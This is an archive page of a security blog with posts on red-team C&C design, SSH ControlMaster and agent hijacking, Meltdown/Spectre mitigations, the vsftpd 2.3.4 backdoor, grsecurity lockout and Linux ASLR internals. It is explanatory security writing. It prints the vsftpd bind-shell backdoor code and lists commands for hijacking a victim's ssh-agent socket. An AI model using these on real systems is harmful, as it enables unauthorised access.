xorl %eax, %eax

Archive for the ‘security’ Category

Multi-stage C&C and Red Teams

A few days ago I read this excellent analysis by the TALOS team. From a technical perspective, the most interesting part is the high-OPSEC multi-stage Command & Control (C&C) infrastructure, which is described by the following diagram from the TALOS team’s post.



The idea is that the real, second-stage C&C server opens a firewall hole and starts communicating only after the first-stage C2 has verified the infected system. On top of that, it uses domain fronting to hide behind Cloudflare, a very popular technique.

So, why am I writing this post?
This post is for any red teamers reading this. Most mature red teams are using domain fronting to emulate advanced adversaries, and the notion of multi-stage C&C is not something new. See for example MITRE’s T1104 from the ATT&CK framework, which lists a few known APT groups that use this method. However, how many times have you seen a red team actually employing this? I know it is a setup that increases complexity, but if you are getting paid to simulate some advanced adversary, do it.

Please read TALOS team’s post and remember, if someone gives you money to simulate what a real APT would do, do it properly. :)

Written by xorl

February 11, 2018 at 17:04

Posted in security

SSH Hijacking for lateral movement

A few weeks ago I contributed the SSH Hijacking lateral movement technique to MITRE’s ATT&CK framework. In this post I’ll go through the different implementations of this attack that I have come across so far to provide more details around it. Note that by hijacking here we mean that someone abuses the existing sessions without having access to the authentication details, that is, without using stolen credentials or private keys.

ControlMaster
SSH’s ControlMaster is a feature which allows multiplexed connections. Performance-wise this is great, since you only have to authenticate to the target system on the first SSH session and then, depending on the SSH daemon configuration, you can open multiple new SSH sessions through the already established connection. This can be tuned on the server side with the following two directives.

MaxSessions
Specifies the maximum number of open sessions permitted per
network connection. The default is 10.

MaxStartups
Specifies the maximum number of concurrent unauthenticated
connections to the SSH daemon. Additional connections will
be dropped until authentication succeeds or the LoginGraceTime
expires for a connection. The default is 10. 

By setting MaxSessions to 1 you can disable ControlMaster/session multiplexing, and each new session will require a complete new connection that includes the authentication step. However, if you don’t, then regardless of how strong an authentication method you are employing for your users, an attacker only has to get code execution on one of your users’ endpoints and wait for that user to SSH somewhere. The attacker can look for the open connections by inspecting the directory specified by the ControlPath directive on the client’s side, or just by using common tools like netstat. Then, if the attacker attempts to open an SSH session to a host that already has a ControlMaster connection, no authentication or new connection is required, as the existing one is re-used. Note that the server side accepts multiplexed sessions by default (MaxSessions defaults to 10), whereas the client-side ControlMaster option defaults to “no” in OpenSSH and has to be enabled by the user.

Agent Authentication
To reduce friction and make the experience smoother, many organizations employ ssh-agent, a service that allows authentication via a local socket file. When you connect to a remote system you can choose whether you want your ssh-agent to be available there too, using the ForwardAgent directive. By forwarding the agent you can move around systems without having to copy keys everywhere or re-authenticate manually. However, this has a downside too. If an attacker has root access on any of the systems to which you have forwarded your agent, they can re-use that socket file to open new SSH sessions with your identity. Here is a very brief overview of how this is done.

# Attacker finds the sshd process of the victim
ps aux | grep sshd

# Attacker looks for SSH_AUTH_SOCK in the victim's environment variables
# (environ is NUL-separated, so split it into lines first)
tr '\0' '\n' < /proc/<pid>/environ | grep SSH_AUTH_SOCK

# Attacker hijacks the victim's ssh-agent socket
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX
ssh-add -l

# Attacker can log in to remote systems as the victim
ssh remote_system -l victim
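
The environment lookup in the second step relies on the layout of /proc/<pid>/environ, which is a flat buffer of NUL-separated NAME=value entries. As a rough sketch of how a tool (offensive or defensive) would parse it, the hypothetical helper environ_lookup() below walks such a buffer. The name and the interface are assumptions of this example only.

```c
#include <stddef.h>
#include <string.h>

/* Search a NUL-separated "NAME=value" buffer (the layout used by
 * /proc/<pid>/environ) for `name`. Returns a pointer to the value
 * inside `buf`, or NULL when the variable is absent. */
const char *environ_lookup(const char *buf, size_t len, const char *name)
{
    size_t nlen = strlen(name);
    size_t off = 0;

    while (off < len) {
        const char *entry = buf + off;
        const char *end = memchr(entry, '\0', len - off);
        size_t elen;

        if (end == NULL)
            break;                      /* unterminated trailing entry */
        elen = (size_t)(end - entry);

        /* Match only on the full name followed by '='. */
        if (elen > nlen && entry[nlen] == '=' &&
            memcmp(entry, name, nlen) == 0)
            return entry + nlen + 1;

        off += elen + 1;                /* jump to the next entry */
    }
    return NULL;
}
```

Reading the buffer itself is left out on purpose; it is a plain read of the file, which requires the same privileges as the grep shown above.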

If you are using OpenSSH, you can mitigate this threat by using the AllowAgentForwarding directive to ensure that only the hosts that need it will have it, rather than the entire environment.

In both of those cases, the attacker never had direct access to the authentication details. However, by abusing SSH features an attacker is able to move laterally into the environment without causing a lot of noise. I already gave some native SSH directives that can be used to mitigate this threat but of course, depending on your requirements you might have to come up with something different.

Written by xorl

February 4, 2018 at 18:32

Posted in security

Thoughts on Meltdown & Spectre

2018 started with the disclosure of some unique low-level exploitation techniques. People who never cared about processor architecture suddenly explain how speculative execution, advanced side-channel analysis, and cache levels work in modern high-performance processors; others confuse the different architecture design flaws; media and software vendors are heavily controlled by big processor manufacturers; Linus accepts patches with up to 30% performance impact without question; and within that chaos we still miss some crucial details. In this post, I will give my thoughts on the following five domains regarding the Meltdown & Spectre exploitation.

  • Real-world impact
  • The victims/targets
  • Media manipulation
  • Nation-state
  • Mitigations



Real-world impact
For any of the disclosed exploitation methods, there is very limited real-world impact (yes, even for the JavaScript one on browsers with SharedArrayBuffer). The reason for this is that those attacks cannot be easily automated. They are definitely feasible, but they require manual intervention to provide any value to the attacker. Consequently, they would only be useful in targeted attacks. But even in this case, why would an attacker prefer to read arbitrary memory using this extremely slow technique instead of exploiting a privilege escalation vulnerability and getting much faster access to all system resources? One could argue that it is more covert. Well, there are some actual attack use cases, and this is my next domain.

The victims/targets
The only real victims for whom this attack is more valuable than a privilege escalation attack are shared hosting providers, whether that is virtual machines, containers, or anything similar. Those exploitation techniques break the sole business model of those companies. Huge players like Amazon, Google, Microsoft, etc. are selling exactly what Meltdown & Spectre proved does not exist: high-quality isolation between shared resources. And that brings us to the next domain.

Media manipulation
All of those big players, including manufacturers such as Intel, AMD, and the rest of the affected vendors, did first-class crisis management when it comes to handling the reputation impact and press statements. They should probably be giving training on how to do this. You would expect that an attack that obliterates your core business selling point would result in massive stock price drops, media chasing the board all over the world, people moving away from those vendors, executives getting fired… Yet, nothing happened. From the business perspective this is a remarkable work of crisis management, but from the consumer perspective this is an alarming level of media manipulation power.

Nation-state
Talking about power, let’s talk about nation-states. Those attacks were not really new. Dave Aitel released this Immunity paper from 2014 that pretty much implements a variant of those exploitation techniques. If we move even further back, we have this paper from 1995 which goes through multiple security flaws of the x86 architecture, including the pre-fetching one. The latter document also contains an interesting sentence in its introduction.

This analysis is being performed under the auspices of the National Security Agency’s Trusted Product Evaluation Program (TPEP).

So, we know that the NSA knew about those design flaws for at least 23 years. Realistically speaking, it is safe to assume that they would have tried to exploit them. Shortly after the public disclosure of the attack, the ShadowBrokers started offering some (allegedly) 0day exploits for those flaws, claiming they were part of the NSA’s toolkit.



Just to be clear, I totally endorse NSA, or any other nation-state for that matter, not disclosing them. They had already disclosed the research paper so the entire world knew about them (including Intel, AMD, and the rest). A tool that allows you to bypass the false sense of memory isolation a cloud provider offers would be extremely valuable for any offensive security team. It is the companies’ fault that they did not fix it. Nevertheless, it was worth mentioning. And talking about fixing…

Mitigations
There are a few different mitigations being proposed or already implemented. Let’s briefly go through them…

  • On the OS side we have the KAISER/KPTI implementation, which basically separates the kernel and user-space page tables, requiring TLB flushes (reloading of the CR3 register, or the use of Process Context Identifiers (PCID) where available). Depending on the application, this can have a major performance impact but, on the other hand, it also prevents a large number of exploitation techniques that were already used in the wild. So, security-wise it is great, but business-wise it will require extra funding for scaling for most companies. And guess what? The manufacturers of those processors are not held accountable for this (they should be, in my opinion, as it was a known issue for decades).
  • The other proposed mitigation was the use of LFENCE instruction to literally stop speculative execution on specific code paths. A clever approach which however is hard to implement and deploy in the real world if you don’t want to have massive performance impact.
  • Intel issued a microcode update that also adds some new capabilities. Those are IBRS (Indirect Branch Restricted Speculation), STIBP (Single Thread Indirect Branch Predictors), and IBPB (Indirect Branch Predictor Barrier). All can be used to control when indirect branch prediction is allowed. However, it brings another interesting attack vector… If Intel can dynamically reprogram their processors via a UEFI channel, maybe attackers can too. Sounds like an interesting research area now that the updates are out.
  • The last one is to recompile the code with a compiler that adds the concept of “return trampolines” (retpoline) which ensures that indirect near jumps and call instructions are bundled with some details about the target of the branch to avoid the cases of branch target injection attacks of Spectre. Again, good idea but expecting to recompile all binaries using this is not a trivial operation.
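
To make the LFENCE bullet a bit more concrete, here is a minimal sketch of the pattern: a bounds check followed by a speculation barrier, so that the dependent load cannot be issued before the check has resolved. The names speculation_barrier() and read_checked() are invented for this example, and it assumes GCC or Clang inline assembly. On anything other than x86-64 the sketch degrades to a compiler-only barrier and gives no hardware guarantee.

```c
#include <stddef.h>
#include <stdint.h>

/* Stop later loads from executing speculatively past this point.
 * LFENCE is emitted only on x86-64 builds (assumption of this sketch);
 * elsewhere this is merely a compiler barrier. */
static inline void speculation_barrier(void)
{
#if defined(__x86_64__) && defined(__GNUC__)
    __asm__ volatile("lfence" ::: "memory");
#elif defined(__GNUC__)
    __asm__ volatile("" ::: "memory");
#endif
}

/* Bounds-checked read: returns table[idx], or 0 when idx is out of range. */
uint8_t read_checked(const uint8_t *table, size_t len, size_t idx)
{
    if (idx >= len)
        return 0;
    speculation_barrier();  /* the load below waits for the check above */
    return table[idx];
}
```

The cost is paid on every call, which is exactly why this approach has to be limited to the specific code paths that handle attacker-controlled indexes.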

As a conclusion, the Meltdown & Spectre exploitation techniques sound like one of the biggest cover-up stories of the infosec community. Known for 20+ years, breaking core business models, nation-states researching them for decades… And yet… No repercussions or even media pressure to any of the involved parties behind them.

Written by xorl

January 10, 2018 at 10:40

Posted in security

vsftpd 2.3.4 Backdoor

This was a recent discovery by Chris Evans and you can read more details in his blog post available here. Furthermore, you can find information about this incident at The H Open as well as LWN.net websites.

So, the backdoor specifically affects version 2.3.4 of the popular FTP daemon and can be found in the str.c file, which contains the string manipulation routines.

int
str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
{
  static struct mystr s_curr_line_str;
  unsigned int pos = 0;
  while (str_getline(p_str, &s_curr_line_str, &pos))
  {
    if (str_equal(&s_curr_line_str, p_line_str))
    {
      return 1;
    }
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))
    {
       vsf_sysutil_extra();
    }
  }
  return 0;
}

Quite obvious. While parsing the received string values, if the string begins with “\x3A\x29” which in ASCII translates to ‘:)’ (a smiley face), it will invoke vsf_sysutil_extra().

This backdoor function was placed in sysdeputil.c file and looks like this:

int
vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  exit(1); 
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  { 
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0); 
  } 
}

It simply opens a new TCP socket listening on port 6200 and spawns a shell for whoever connects to that port.

So, by using the ‘:)’ as username the attackers were able to trigger this backdoor in vsftpd 2.3.4.
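
If you want to flag this trigger in FTP logs or captured traffic, the check is trivial. The sketch below is not taken from vsftpd; has_backdoor_trigger() is a hypothetical helper that simply scans a buffer for the same two bytes the backdoor compares against.

```c
#include <stddef.h>

/* Return 1 if the byte pair 0x3a 0x29 (":)") appears anywhere in buf,
 * 0 otherwise. Hypothetical detection helper, not vsftpd code. */
int has_backdoor_trigger(const char *buf, size_t len)
{
    size_t i;

    for (i = 0; i + 1 < len; i++) {
        if (buf[i] == 0x3a && buf[i + 1] == 0x29)
            return 1;
    }
    return 0;
}
```

Calling it on the argument of every USER command would catch the trigger, at the price of false positives for users who really do have a smiley in their login name.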

Written by xorl

July 5, 2011 at 03:54

Posted in hax, security

GRKERNSEC_KERN_LOCKOUT Active Kernel Exploit Response

This is a brand new feature of “Address Space Protection” that grsecurity offers. Its configuration option is very clear and it is implemented by adding just two new routines in the existing patch.

config GRKERNSEC_KERN_LOCKOUT
	bool "Active kernel exploit response"
	depends on X86
	help
	  If you say Y here, when a PaX alert is triggered due to suspicious
	  activity in the kernel (from KERNEXEC/UDEREF/USERCOPY)
	  or an OOPs occurs due to bad memory accesses, instead of just
	  terminating the offending process (and potentially allowing
	  a subsequent exploit from the same user), we will take one of two
	  actions:
	   If the user was root, we will panic the system
	   If the user was non-root, we will log the attempt, terminate
	   all processes owned by the user, then prevent them from creating
	   any new processes until the system is restarted
	  This deters repeated kernel exploitation/bruteforcing attempts
	  and is useful for later forensics.

First of all, the ‘user_struct’ at include/linux/sched.h was updated to include two new members that will be used to keep track of the banned users. Here is the code snippet that shows the newly added members.

/*
 * Some day this will be a full-fledged user tracking system..
 */
struct user_struct {
   ...
        struct key *session_keyring;    /* UID's default session keyring */
#endif
 
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	unsigned int banned;
	unsigned long ban_expires;
#endif
   ...
};

Next we can have a look at grsecurity/grsec_sig.c to see the first function which is responsible for handling the banned users.

int gr_process_user_ban(void)
{
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	if (unlikely(current->cred->user->banned)) {
		struct user_struct *user = current->cred->user;
		if (user->ban_expires != ~0UL && time_after_eq(get_seconds(), user->ban_expires)) {
			user->banned = 0;
			user->ban_expires = 0;
			free_uid(user);
		} else
			return -EPERM;
	}
#endif
	return 0;
}

It checks whether the user is banned and, if so, returns -EPERM unless the time stored in ‘user->ban_expires’ has passed, in which case the ban is cleared and the user’s status is reset. Of course, the reset never happens for users with the value ‘~0UL’ in the ‘ban_expires’ variable. Those users will be banned until the system is restarted.
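
The expiry logic is easier to follow outside of the kernel. Below is a small user-space model of it; struct ban_state, time_after_eq_model() and process_user_ban_model() are names made up for this sketch, the current time is passed in as a parameter instead of coming from get_seconds(), and the free_uid() reference drop is left out.

```c
#include <errno.h>

/* Hypothetical stand-in for the two members added to user_struct. */
struct ban_state {
    unsigned int banned;
    unsigned long ban_expires;      /* ~0UL means "until reboot" */
};

/* Wrap-safe "a is at or after b", in the spirit of time_after_eq(). */
static int time_after_eq_model(unsigned long a, unsigned long b)
{
    return (long)(a - b) >= 0;
}

/* Returns 0 if the user may proceed, -EPERM while the ban is active. */
int process_user_ban_model(struct ban_state *u, unsigned long now)
{
    if (!u->banned)
        return 0;
    if (u->ban_expires != ~0UL && time_after_eq_model(now, u->ban_expires)) {
        u->banned = 0;              /* the timed ban has run out */
        u->ban_expires = 0;
        return 0;
    }
    return -EPERM;
}
```

A ban with ‘ban_expires’ set to ‘~0UL’ never reaches the reset branch, which is what makes it last until the next reboot.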

The next routine also located in the same source code file is this one.

void gr_handle_kernel_exploit(void)
{
#ifdef CONFIG_GRKERNSEC_KERN_LOCKOUT
	const struct cred *cred;
	struct task_struct *tsk, *tsk2;
	struct user_struct *user;
	uid_t uid;

	if (in_irq() || in_serving_softirq() || in_nmi())
		panic("grsec: halting the system due to suspicious kernel crash caused in interrupt context");

	uid = current_uid();

	if (uid == 0)
		panic("grsec: halting the system due to suspicious kernel crash caused by root");
	else {
		/* kill all the processes of this user, hold a reference
		   to their creds struct, and prevent them from creating
		   another process until system reset
		*/
		printk(KERN_ALERT "grsec: banning user with uid %u until system restart for suspicious kernel crash\n", uid);
		/* we intentionally leak this ref */
		user = get_uid(current->cred->user);
		if (user) {
			user->banned = 1;
			user->ban_expires = ~0UL;
		}

		read_lock(&tasklist_lock);
		do_each_thread(tsk2, tsk) {
			cred = __task_cred(tsk);
			if (cred->uid == uid)
				gr_fake_force_sig(SIGKILL, tsk);
		} while_each_thread(tsk2, tsk);
		read_unlock(&tasklist_lock);
	}
#endif
}

So, if this is called in the context of an interrupt (IRQ, SoftIRQ or NMI) or the current user is root, it will immediately invoke panic() to halt the system and avoid any possible further exploitation of a kernel vulnerability. In any other case it will log the event and ban that user by updating the ‘user->banned’ and ‘user->ban_expires’ members of the ‘user_struct’ structure. The final ‘do_each_thread’/‘while_each_thread’ loop will use gr_fake_force_sig(), which is shown below, to terminate (by sending a kill signal) every task owned by the user who triggered the event.

#ifdef CONFIG_GRKERNSEC
extern int specific_send_sig_info(int sig, struct siginfo *info, struct task_struct *t);

int gr_fake_force_sig(int sig, struct task_struct *t)
{
	unsigned long int flags;
	int ret, blocked, ignored;
	struct k_sigaction *action;

	spin_lock_irqsave(&t->sighand->siglock, flags);
	action = &t->sighand->action[sig-1];
	ignored = action->sa.sa_handler == SIG_IGN;
	blocked = sigismember(&t->blocked, sig);
	if (blocked || ignored) {
		action->sa.sa_handler = SIG_DFL;
		if (blocked) {
			sigdelset(&t->blocked, sig);
			recalc_sigpending_and_wake(t);
		}
	}
	if (action->sa.sa_handler == SIG_DFL)
		t->signal->flags &= ~SIGNAL_UNKILLABLE;
	ret = specific_send_sig_info(sig, SEND_SIG_PRIV, t);

	spin_unlock_irqrestore(&t->sighand->siglock, flags);

	return ret;
}
#endif

This routine will send the requested signal to the process.

So, now to the actual patching. The first patched code is the __kprobes oops_end() routine located in the arch/x86/kernel/dumpstack.c file.

void __kprobes oops_end(unsigned long flags, struct pt_regs *regs, int signr)
{
   ...
 	if (panic_on_oops)
 		panic("Fatal exception");

	gr_handle_kernel_exploit();

	do_group_exit(signr);
}

This is triggered at the last step of a kernel OOPS. Consequently, it’s an ideal location to place this protection. Next we have the ‘execve’ routines that are invoked for spawning new processes, specifically the compat_do_execve() you see here from the fs/compat.c file.

/*
 * compat_do_execve() is mostly a copy of do_execve(), with the exception
 * that it processes 32 bit argv and envp pointers.
 */
int compat_do_execve(char * filename,
        compat_uptr_t __user *argv,
        compat_uptr_t __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

This is where it checks if the user is banned. Of course, a similar check is also included in the do_execve() routine from fs/exec.c.

/*
 * sys_execve() executes a new program.
 */
int do_execve(const char * filename,
        const char __user *const __user *argv,
        const char __user *const __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

Finally, the pax_report_usercopy() is updated to handle the possible attacks using the new locking-out feature.

	
void pax_report_usercopy(const void *ptr, unsigned long len, bool to, const char *type)
{
	if (current->signal->curr_ip)
		printk(KERN_ERR "PAX: From %pI4: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			&current->signal->curr_ip, to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);
	else
		printk(KERN_ERR "PAX: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);

	dump_stack();
	gr_handle_kernel_exploit();
	do_group_exit(SIGKILL);
}

Written by xorl

April 27, 2011 at 22:43

Posted in grsecurity, linux, security

Linux kernel /proc/slabinfo Protection

Recently, Dan Rosenberg committed this patch to the Linux kernel. The patch affects SLAB and SLUB allocators by changing the permissions of the ‘/proc/slabinfo’ file in slab_proc_init() for SLAB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo",S_IWUSR|S_IRUGO,NULL,&proc_slabinfo_operations);
+	proc_create("slabinfo", S_IWUSR|S_IRUSR, NULL,
+		    &proc_slabinfo_operations);
#ifdef CONFIG_DEBUG_SLAB_LEAK

As well as in the equivalent slab_proc_init() for SLUB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo", S_IRUGO, NULL, &proc_slabinfo_operations);
+	proc_create("slabinfo", S_IRUSR, NULL, &proc_slabinfo_operations);
 	return 0;
}

The concept behind this is something quite simple which was previously implemented in grsecurity (check out GRKERNSEC_PROC_ADD) by spender. Almost anyone who has ever developed a kernel heap exploit for the Linux kernel knows that using ‘/proc/slabinfo’ you can easily track the status of the SLAB you are corrupting.
This patch limits the reliability of Linux kernel heap exploitation since unprivileged users can no longer read this PROCFS file.

Written by xorl

March 5, 2011 at 14:22

Posted in linux, security

Linux kernel ASLR Implementation

Since June 2005 (specifically 2.6.12), the Linux kernel has had built-in ASLR (Address Space Layout Randomization) support. In this post I’m trying to give a brief description of how this is implemented. However, I will be focusing more on the x86 architecture, since this protection mechanism leads to some architecture-dependent issues.

Random Number Generation
The PRNG used for ASLR of Linux kernel is the get_random_int() routine as we’ll see later in this post. This function is located at drivers/char/random.c file and it is shown below.

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];
  ...
/*
 * Get a random word for internal kernel use only. Similar to urandom but
 * with the goal of minimal entropy pool depletion. As a result, the random
 * value is not cryptographically secure but for several uses the cost of
 * depleting entropy is too high
 */
DEFINE_PER_CPU(__u32 [4], get_random_int_hash);
unsigned int get_random_int(void)
{
        struct keydata *keyptr;
        __u32 *hash = get_cpu_var(get_random_int_hash);
        int ret;

        keyptr = get_keyptr();
        hash[0] += current->pid + jiffies + get_cycles();

        ret = half_md4_transform(hash, keyptr->secret);
        put_cpu_var(get_random_int_hash);

        return ret;
}

After defining some per-processor values, it uses the get_cpu_var()/put_cpu_var() C macros to get and release the processor-specific hash array. This leaves us with get_keyptr(), which returns the currently active ‘keydata’ structure, and the actual random number generation.
The ‘keydata’ lookup is performed using this C function:

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];

static unsigned int ip_cnt;
  ...
static inline struct keydata *get_keyptr(void)
{
        struct keydata *keyptr = &ip_keydata[ip_cnt & 1];

        smp_rmb();

        return keyptr;
}

The smp_rmb() macro is defined in arch/x86/include/asm/system.h header file for the x86 architecture and it stands for Read Memory Barrier.

/*
 * Force strict CPU ordering.
 * And yes, this is required on UP too when we're talking
 * to devices.
 */
#ifdef CONFIG_X86_32
/*
 * Some non-Intel clones support out of order store. wmb() ceases to be a
 * nop for these.
 */
#define mb() alternative("lock; addl $0,0(%%esp)", "mfence", X86_FEATURE_XMM2)
#define rmb() alternative("lock; addl $0,0(%%esp)", "lfence", X86_FEATURE_XMM2)
#define wmb() alternative("lock; addl $0,0(%%esp)", "sfence", X86_FEATURE_XMM)
#else
#define mb()    asm volatile("mfence":::"memory")
#define rmb()   asm volatile("lfence":::"memory")
#define wmb()   asm volatile("sfence" ::: "memory")
#endif
  ...
#ifdef CONFIG_SMP
#define smp_mb()        mb()
#ifdef CONFIG_X86_PPRO_FENCE
# define smp_rmb()      rmb()
#else
# define smp_rmb()      barrier()
#endif

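A read barrier guarantees that reads issued before it are completed before any reads issued after it. In the same header file we can read the following comment, which documents the lighter read_barrier_depends() primitive by comparing it to rmb():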

 * No data-dependent reads from memory-like regions are ever reordered
 * over this barrier.  All reads preceding this primitive are guaranteed
 * to access memory (but not necessarily other CPUs' caches) before any
 * reads following this primitive that depend on the data return by
 * any of the preceding reads.  This primitive is much lighter weight than
 * rmb() on most CPUs, and is never heavier weight than is
 * rmb().
 *
 * These ordering constraints are respected by both the local CPU
 * and the compiler.
 *
 * Ordering is not guaranteed by anything other than these primitives,
 * not even by data dependencies.  See the documentation for
 * memory_barrier() for examples and URLs to more information.

This ensures that the read of ‘keyptr’ doesn’t get reordered. Back in get_random_int(), we can now have a look at the exact random number generation code. According to:

hash[0] += current->pid + jiffies + get_cycles()

We have four different values being involved. Those are:
– The current value of the first element of the per-processor ‘hash’ array, ‘hash[0]’
– The process ID of the currently executing process
– The system’s jiffies value
– The CPU cycle count
The last value is derived from the get_cycles() inline function that is defined at arch/x86/include/asm/tsc.h for the x86 architecture.

static inline cycles_t get_cycles(void)
{
        unsigned long long ret = 0;

#ifndef CONFIG_X86_TSC
        if (!cpu_has_tsc)
                return 0;
#endif
        rdtscll(ret);

        return ret;
}

This means that if the processor supports the rdtsc instruction, it will use the following C macro from the arch/x86/include/asm/msr.h header file:

static __always_inline unsigned long long __native_read_tsc(void)
{
        DECLARE_ARGS(val, low, high);

        asm volatile("rdtsc" : EAX_EDX_RET(val, low, high));

        return EAX_EDX_VAL(val, low, high);
}
  ...
#define rdtscll(val)                                            \
        ((val) = __native_read_tsc())

This basically just executes the rdtsc instruction.
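
The same instruction is available from user space, so the behaviour can be tried without touching the kernel. This is a rough equivalent under the assumption of GCC or Clang on x86; tsc_combine() and read_tsc() are names invented here, and the "=a"/"=d" constraints play the role of the kernel’s EAX_EDX_RET() helper.

```c
#include <stdint.h>

/* Join the two 32-bit halves that RDTSC leaves in EDX:EAX. */
uint64_t tsc_combine(uint32_t low, uint32_t high)
{
    return ((uint64_t)high << 32) | low;
}

/* Read the time-stamp counter. Returns 0 on non-x86 builds, much like
 * get_cycles() returns 0 when no TSC is available. */
uint64_t read_tsc(void)
{
#if (defined(__x86_64__) || defined(__i386__)) && defined(__GNUC__)
    uint32_t low, high;

    __asm__ volatile("rdtsc" : "=a"(low), "=d"(high));
    return tsc_combine(low, high);
#else
    return 0;
#endif
}
```

Two consecutive calls to read_tsc() normally differ by a small, hard to predict number of cycles, which is the property get_random_int() is counting on.
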
Back in get_random_int(), we can see that even though a lot of difficult-to-guess values are used to generate that pseudo-random integer, it also calls half_md4_transform(), which is defined in lib/halfmd4.c and implements a basic MD4 transform.

/* F, G and H are basic MD4 functions: selection, majority, parity */
#define F(x, y, z) ((z) ^ ((x) & ((y) ^ (z))))
#define G(x, y, z) (((x) & (y)) + (((x) ^ (y)) & (z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
  ...
#define ROUND(f, a, b, c, d, x, s)      \
        (a += f(b, c, d) + x, a = (a << s) | (a >> (32 - s)))
#define K1 0
#define K2 013240474631UL
#define K3 015666365641UL
  ...
__u32 half_md4_transform(__u32 buf[4], __u32 const in[8])
{
        __u32 a = buf[0], b = buf[1], c = buf[2], d = buf[3];

        /* Round 1 */
        ROUND(F, a, b, c, d, in[0] + K1,  3);
        ROUND(F, d, a, b, c, in[1] + K1,  7);
        ROUND(F, c, d, a, b, in[2] + K1, 11);
        ROUND(F, b, c, d, a, in[3] + K1, 19);
        ROUND(F, a, b, c, d, in[4] + K1,  3);
        ROUND(F, d, a, b, c, in[5] + K1,  7);
        ROUND(F, c, d, a, b, in[6] + K1, 11);
        ROUND(F, b, c, d, a, in[7] + K1, 19);

        /* Round 2 */
        ROUND(G, a, b, c, d, in[1] + K2,  3);
        ROUND(G, d, a, b, c, in[3] + K2,  5);
        ROUND(G, c, d, a, b, in[5] + K2,  9);
        ROUND(G, b, c, d, a, in[7] + K2, 13);
        ROUND(G, a, b, c, d, in[0] + K2,  3);
        ROUND(G, d, a, b, c, in[2] + K2,  5);
        ROUND(G, c, d, a, b, in[4] + K2,  9);
        ROUND(G, b, c, d, a, in[6] + K2, 13);

        /* Round 3 */
        ROUND(H, a, b, c, d, in[3] + K3,  3);
        ROUND(H, d, a, b, c, in[7] + K3,  9);
        ROUND(H, c, d, a, b, in[2] + K3, 11);
        ROUND(H, b, c, d, a, in[6] + K3, 15);
        ROUND(H, a, b, c, d, in[1] + K3,  3);
        ROUND(H, d, a, b, c, in[5] + K3,  9);
        ROUND(H, c, d, a, b, in[0] + K3, 11);
        ROUND(H, b, c, d, a, in[4] + K3, 15);

        buf[0] += a;
        buf[1] += b;
        buf[2] += c;
        buf[3] += d;

        return buf[1]; /* "most hashed" word */
}

This makes things even more complex for anyone attempting to guess the resulting integer. Now that we have a basic understanding of the pseudo-random number generation routine utilized by the Linux ASLR implementation, we can move on to the actual code that uses it.
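
To see what a single ROUND() step of the transform does, it can be unrolled into plain functions. The sketch below covers only the F (selection) variant; rol32_model(), md4_f() and md4_round_f() are names chosen for this example and do not exist in the kernel.

```c
#include <stdint.h>

/* Rotate a 32-bit word left by s bits (0 < s < 32). */
static uint32_t rol32_model(uint32_t v, unsigned int s)
{
    return (v << s) | (v >> (32 - s));
}

/* MD4 selection function: takes the bits of y where x is 1 and the
 * bits of z where x is 0. */
static uint32_t md4_f(uint32_t x, uint32_t y, uint32_t z)
{
    return z ^ (x & (y ^ z));
}

/* One ROUND(F, a, b, c, d, x, s) step; returns the new value of a. */
uint32_t md4_round_f(uint32_t a, uint32_t b, uint32_t c, uint32_t d,
                     uint32_t x, unsigned int s)
{
    return rol32_model(a + md4_f(b, c, d) + x, s);
}
```

For example, md4_round_f(0, 0, 0, 0, 1, 3) adds the input word 1 to an all-zero state and rotates it left by three bits, giving 8. The real transform chains 24 such steps over the secret key words.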

brk(2) Randomization
The Linux kernel’s ELF loader is located in fs/binfmt_elf.c. The routine that loads the actual executable binary file is load_elf_binary() which, among other things, includes the following code.

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
        unsigned long load_addr = 0, load_bias = 0;
  ...
#ifdef arch_randomize_brk
        if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1))
                current->mm->brk = current->mm->start_brk =
                        arch_randomize_brk(current->mm);
#endif
  ...
out_free_ph:
        kfree(elf_phdata);
        goto out;
}

This means that if ‘arch_randomize_brk’ is defined, it will check whether the current process should have a randomized virtual address space using the ‘PF_RANDOMIZE’ flag, as well as whether ‘randomize_va_space’ is greater than 1. If this is the case, it will update the start and the current end of its data segment (‘start_brk’ and ‘brk’) using the return value of arch_randomize_brk().
The latter routine can be found at arch/x86/kernel/process.c for the x86 family.

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
        unsigned long range_end = mm->brk + 0x02000000;
        return randomize_range(mm->brk, range_end, 0) ? : mm->brk;
}

